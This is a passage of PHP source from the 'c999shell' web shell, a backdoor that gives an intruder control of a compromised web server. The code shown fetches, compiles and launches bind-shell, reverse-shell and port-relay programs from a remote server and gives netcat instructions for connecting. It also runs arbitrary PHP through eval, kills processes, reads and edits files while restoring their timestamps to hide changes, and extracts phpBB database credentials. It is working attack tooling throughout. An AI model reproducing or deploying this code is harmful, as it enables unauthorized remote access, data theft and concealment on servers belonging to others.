2117 echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
2118 }
2119 echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
2120 echo "</form>";
2121 }
2122}
2123if ($act == "tools")
2124{
2125 $bndportsrcs = array(
2126 "c999sh_bindport.pl"=>array("Using PERL","perl %path %port"),
2127 "c999sh_bindport.c"=>array("Using C","%path %port %pass")
2128 );
2129 $bcsrcs = array(
2130 "c999sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
2131 "c999sh_backconn.c"=>array("Using C","%path %host %port")
2132 );
2133 $dpsrcs = array(
2134 "c999sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
2135 "c999sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
2136 );
2137 if (!is_array($bind)) {$bind = array();}
2138 if (!is_array($bc)) {$bc = array();}
2139 if (!is_array($datapipe)) {$datapipe = array();}
2140
2141 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
2142 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
2143
2144 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
2145 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
2146
2147 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
2148 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
2149 if (!empty($bindsubmit))
2150 {
2151 echo "<b>Result of binding port:</b><br>";
2152 $v = $bndportsrcs[$bind["src"]];
2153 if (empty($v)) {echo "Unknown file!<br>";}
2154 elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
2155 else
2156 {
2157 $w = explode(".",$bind["src"]);
2158 $ext = $w[count($w)-1];
2159 unset($w[count($w)-1]);
2160 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2161 $binpath = $tmpdir.join(".",$w).rand(0,999);
2162 if ($ext == "pl") {$binpath = $srcpath;}
2163 @unlink($srcpath);
2164 $fp = fopen($srcpath,"ab+");
2165 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2166 elseif (!$data = c999getsource($bind["src"])) {echo "Can't download sources!";}
2167 else
2168 {
2169 fwrite($fp,$data,strlen($data));
2170 fclose($fp);
2171 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2172 $v[1] = str_replace("%path",$binpath,$v[1]);
2173 $v[1] = str_replace("%port",$bind["port"],$v[1]);
2174 $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
2175 $v[1] = str_replace("//","/",$v[1]);
2176 $retbind = myshellexec($v[1]." > /dev/null &");
2177 sleep(5);
2178 $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
2179 if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
2180 else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
2181 }
2182 echo "<br>";
2183 }
2184 }
2185 if (!empty($bcsubmit))
2186 {
2187 echo "<b>Result of back connection:</b><br>";
2188 $v = $bcsrcs[$bc["src"]];
2189 if (empty($v)) {echo "Unknown file!<br>";}
2190 else
2191 {
2192 $w = explode(".",$bc["src"]);
2193 $ext = $w[count($w)-1];
2194 unset($w[count($w)-1]);
2195 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2196 $binpath = $tmpdir.join(".",$w).rand(0,999);
2197 if ($ext == "pl") {$binpath = $srcpath;}
2198 @unlink($srcpath);
2199 $fp = fopen($srcpath,"ab+");
2200 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2201 elseif (!$data = c999getsource($bc["src"])) {echo "Can't download sources!";}
2202 else
2203 {
2204 fwrite($fp,$data,strlen($data));
2205 fclose($fp);
2206 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2207 $v[1] = str_replace("%path",$binpath,$v[1]);
2208 $v[1] = str_replace("%host",$bc["host"],$v[1]);
2209 $v[1] = str_replace("%port",$bc["port"],$v[1]);
2210 $v[1] = str_replace("//","/",$v[1]);
2211 $retbind = myshellexec($v[1]." > /dev/null &");
2212 echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
2213 }
2214 }
2215 }
2216 if (!empty($dpsubmit))
2217 {
2218 echo "<b>Result of datapipe-running:</b><br>";
2219 $v = $dpsrcs[$datapipe["src"]];
2220 if (empty($v)) {echo "Unknown file!<br>";}
2221 elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
2222 else
2223 {
2224 $srcpath = $tmpdir.$datapipe["src"];
2225 $w = explode(".",$datapipe["src"]);
2226 $ext = $w[count($w)-1];
2227 unset($w[count($w)-1]);
2228 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2229 $binpath = $tmpdir.join(".",$w).rand(0,999);
2230 if ($ext == "pl") {$binpath = $srcpath;}
2231 @unlink($srcpath);
2232 $fp = fopen($srcpath,"ab+");
2233 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2234 elseif (!$data = c999getsource($datapipe["src"])) {echo "Can't download sources!";}
2235 else
2236 {
2237 fwrite($fp,$data,strlen($data));
2238 fclose($fp);
2239 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2240 list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
2241 $v[1] = str_replace("%path",$binpath,$v[1]);
2242 $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
2243 $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
2244 $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
2245 $v[1] = str_replace("//","/",$v[1]);
2246 $retbind = myshellexec($v[1]." > /dev/null &");
2247 sleep(5);
2248 $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
2249 if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
2250 else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
2251 }
2252 echo "<br>";
2253 }
2254 }
2255 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
2256 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2257 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
2258<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
2259foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2260?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
2261Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
2262<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
2263foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2264?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
2265}
2266if ($act == "processes")
2267{
2268 echo "<b>Processes:</b><br>";
2269 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
2270 else {$handler = "tasklist";}
2271 $ret = myshellexec($handler);
2272 if (!$ret) {echo "Can't execute \"".$handler."\"!";}
2273 else
2274 {
2275 if (empty($processes_sort)) {$processes_sort = $sort_default;}
2276 $parsesort = parsesort($processes_sort);
2277 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2278 $k = $parsesort[0];
2279 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2280 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2281 $ret = htmlspecialchars($ret);
2282 if (!$win)
2283 {
2284 if ($pid)
2285 {
2286 if (is_null($sig)) {$sig = 9;}
2287 echo "Sending signal ".$sig." to #".$pid."... ";
2288 if (posix_kill($pid,$sig)) {echo "OK.";}
2289 else {echo "ERROR.";}
2290 }
2291 while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
2292 $stack = explode("\n",$ret);
2293 $head = explode(" ",$stack[0]);
2294 unset($stack[0]);
2295 for($i=0;$i<count($head);$i++)
2296 {
2297 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
2298 }
2299 $prcs = array();
2300 foreach ($stack as $line)
2301 {
2302 if (!empty($line))
2303{
2304 echo "<tr>";
2305 $line = explode(" ",$line);
2306 $line[10] = join(" ",array_slice($line,10));
2307 $line = array_slice($line,0,11);
2308 if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
2309 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2310 $prcs[] = $line;
2311 echo "</tr>";
2312 }
2313 }
2314 }
2315 else
2316 {
2317 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2318 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2319 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2320 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2321 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2322 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2323 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2324 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2325 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2326 while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
2327 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2328 $ret = convert_cyr_string($ret,"d","w");
2329 $stack = explode("\n",$ret);
2330 unset($stack[0],$stack[2]);
2331 $stack = array_values($stack);
2332 $head = explode("",$stack[0]);
2333 $head[1] = explode(" ",$head[1]);
2334 $head[1] = $head[1][0];
2335 $stack = array_slice($stack,1);
2336 unset($head[2]);
2337 $head = array_values($head);
2338 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2339 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2340 if ($k > count($head)) {$k = count($head)-1;}
2341 for($i=0;$i<count($head);$i++)
2342 {
2343 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
2344 }
2345 $prcs = array();
2346 foreach ($stack as $line)
2347 {
2348 if (!empty($line))
2349 {
2350 echo "<tr>";
2351 $line = explode("",$line);
2352 $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
2353 $line[2] = intval(str_replace(" ","",$line[2]))*1024;
2354 $prcs[] = $line;
2355 echo "</tr>";
2356 }
2357 }
2358 }
2359 $head[$k] = "<b>".$head[$k]."</b>".$y;
2360 $v = $processes_sort[0];
2361 usort($prcs,"tabsort");
2362 if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
2363 $tab = array();
2364 $tab[] = $head;
2365 $tab = array_merge($tab,$prcs);
2366 echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
2367 foreach($tab as $i=>$k)
2368 {
2369 echo "<tr>";
2370 foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
2371 echo "</tr>";
2372 }
2373 echo "</table>";
2374 }
2375}
2376if ($act == "eval")
2377{
2378 if (!empty($eval))
2379 {
2380 echo "<b>Result of execution this PHP-code</b>:<br>";
2381 $tmp = ob_get_contents();
2382 $olddir = realpath(".");
2383 @chdir($d);
2384 if ($tmp)
2385 {
2386 ob_clean();
2387 eval($eval);
2388 $ret = ob_get_contents();
2389 $ret = convert_cyr_string($ret,"d","w");
2390 ob_clean();
2391 echo $tmp;
2392 if ($eval_txt)
2393 {
2394 $rows = count(explode("\r\n",$ret))+1;
2395 if ($rows < 10) {$rows = 10;}
2396 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2397 }
2398 else {echo $ret."<br>";}
2399 }
2400 else
2401 {
2402 if ($eval_txt)
2403 {
2404 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
2405 eval($eval);
2406 echo "</textarea>";
2407 }
2408 else {echo $ret;}
2409 }
2410 @chdir($olddir);
2411 }
2412 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
2413 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
2414}
2415if ($act == "f")
2416{
2417 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
2418 {
2419 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
2420 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
2421 }
2422 else
2423 {
2424 $r = @file_get_contents($d.$f);
2425 $ext = explode(".",$f);
2426 $c = count($ext)-1;
2427 $ext = $ext[$c];
2428 $ext = strtolower($ext);
2429 $rft = "";
2430 foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
2431 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
2432 if (empty($ft)) {$ft = $rft;}
2433 $arr = array(
2434 array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
2435 array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
2436 array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
2437 array("Code","code"),
2438 array("Session","phpsess"),
2439 array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
2440 array("SDB","sdb"),
2441 array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
2442 array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
2443 array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
2444 array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
2445 array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
2446 );
2447 echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
2448 foreach($arr as $t)
2449 {
2450 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
2451 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
2452 else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
2453 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
2454 }
2455 echo "<hr size=\"1\" noshade>";
2456 if ($ft == "info")
2457 {
2458 echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
2459 if (!$win)
2460 {
2461 echo "<tr><td><b>Owner/Group</b></td><td> ";
2462 $ow = posix_getpwuid(fileowner($d.$f));
2463 $gr = posix_getgrgid(filegroup($d.$f));
2464 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2465 }
2466 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
2467 $fi = fopen($d.$f,"rb");
2468 if ($fi)
2469 {
2470 if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
2471 else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
2472 $n = 0;
2473 $a0 = "00000000<br>";
2474 $a1 = "";
2475 $a2 = "";
2476 for ($i=0; $i<strlen($str); $i++)
2477 {
2478 $a1 .= sprintf("%02X",ord($str[$i]))." ";
2479 switch (ord($str[$i]))
2480 {
2481 case 0: $a2 .= "<font>0</font>"; break;
2482 case 32:
2483 case 10:
2484 case 13: $a2 .= "&nbsp;"; break;
2485 default: $a2 .= htmlspecialchars($str[$i]);
2486 }
2487 $n++;
2488 if ($n == $hexdump_rows)
2489 {
2490 $n = 0;
2491 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2492 $a1 .= "<br>";
2493 $a2 .= "<br>";
2494 }
2495 }
2496 //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
2497 echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
2498 }
2499 $encoded = "";
2500 if ($base64 == 1)
2501 {
2502 echo "<b>Base64 Encode</b><br>";
2503 $encoded = base64_encode(file_get_contents($d.$f));
2504 }
2505 elseif($base64 == 2)
2506 {
2507 echo "<b>Base64 Encode + Chunk</b><br>";
2508 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2509 }
2510 elseif($base64 == 3)
2511 {
2512 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
2513 $encoded = base64_encode(file_get_contents($d.$f));
2514 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2515 }
2516 elseif($base64 == 4)
2517 {
2518 $text = file_get_contents($d.$f);
2519 $encoded = base64_decode($text);
2520 echo "<b>Base64 Decode";
2521 if (base64_encode($encoded) != $text) {echo " (failed)";}
2522 echo "</b><br>";
2523 }
2524 if (!empty($encoded))
2525 {
2526 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
2527 }
2528 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
2529<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
2530<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
2531<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
2532<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
2533<P>";
2534 }
2535 elseif ($ft == "html")
2536 {
2537 if ($white) {@ob_clean();}
2538 echo $r;
2539 if ($white) {c999shexit();}
2540 }
2541 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
2542 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
2543 elseif ($ft == "phpsess")
2544 {
2545 echo "<pre>";
2546 $v = explode("|",$r);
2547 echo $v[0]."<br>";
2548 var_dump(unserialize($v[1]));
2549 echo "</pre>";
2550 }
2551 elseif ($ft == "exe")
2552 {
2553 $ext = explode(".",$f);
2554 $c = count($ext)-1;
2555 $ext = $ext[$c];
2556 $ext = strtolower($ext);
2557 $rft = "";
2558 foreach($exeftypes as $k=>$v)
2559 {
2560 if (in_array($ext,$v)) {$rft = $k; break;}
2561 }
2562 $cmd = str_replace("%f%",$f,$rft);
2563 echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
2564 }
2565 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
2566 elseif ($ft == "code")
2567 {
2568 if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
2569 {
2570 $arr = explode("\n",$r);
2571 if (count($arr == 18))
2572 {
2573 include($d.$f);
2574 echo "<b>phpBB configuration is detected in this file!<br>";
2575 if ($dbms == "mysql4") {$dbms = "mysql";}
2576 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2577 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";}
2578 echo "Parameters for manual connect:<br>";
2579 $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
2580 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2581 echo "</b><hr size=\"1\" noshade>";
2582 }
2583 }
2584 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
2585 if (!empty($white)) {@ob_clean();}
2586 highlight_file($d.$f);
2587 if (!empty($white)) {c999shexit();}
2588 echo "</div>";
2589 }
2590 elseif ($ft == "download")
2591 {
2592 @ob_clean();
2593 header("Content-type: application/octet-stream");
2594 header("Content-length: ".filesize($d.$f));
2595 header("Content-disposition: attachment; filename=\"".$f."\";");
2596 echo $r;
2597 exit;
2598 }
2599 elseif ($ft == "notepad")
2600 {
2601 @ob_clean();
2602 header("Content-type: text/plain");
2603 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2604 echo($r);
2605 exit;
2606 }
2607 elseif ($ft == "img")
2608 {
2609 $inf = getimagesize($d.$f);
2610 if (!$white)
2611 {
2612 if (empty($imgsize)) {$imgsize = 20;}
2613 $width = $inf[0]/100*$imgsize;
2614 $height = $inf[1]/100*$imgsize;
2615 echo "<center><b>Size:</b>&nbsp;";
2616 $sizes = array("100","50","20");
2617 foreach ($sizes as $v)
2618 {
2619 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2620 if ($imgsize != $v ) {echo $v;}
2621 else {echo "<u>".$v."</u>";}
2622 echo "</a>&nbsp;&nbsp;&nbsp;";
2623 }
2624 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
2625 }
2626 else
2627 {
2628 @ob_clean();
2629 $ext = explode($f,".");
2630 $ext = $ext[count($ext)-1];
2631 header("Content-type: ".$inf["mime"]);
2632 readfile($d.$f);
2633 exit;
2634 }
2635 }
2636 elseif ($ft == "edit")
2637 {
2638 if (!empty($submit))
2639 {
2640 if ($filestealth) {$stat = stat($d.$f);}
2641 $fp = fopen($d.$f,"w");
2642 if (!$fp) {echo "<b>Can't write to file!</b>";}
2643 else
2644 {
2645 echo "<b>Saved!</b>";
2646 fwrite($fp,$edit_text);
2647 fclose($fp);
2648 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2649 $r = $edit_text;
2650 }
2651 }
2652 $rows = count(explode("\r\n",$r));
2653 if ($rows < 10) {$rows = 10;}
2654 if ($rows > 30) {$rows = 30;}
2655 echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2656 }
2657 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2658 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
2659 }
2660}
2661}
2662else
2663{
2664 @ob_clean();
2665 $images = array(
2666"arrow_ltr"=>
2667"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
2668"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2669"back"=>
2670"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2671"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2672"Wg0JADs=",
2673"buffer"=>
2674"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2675"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2676"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2677"change"=>
2678"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
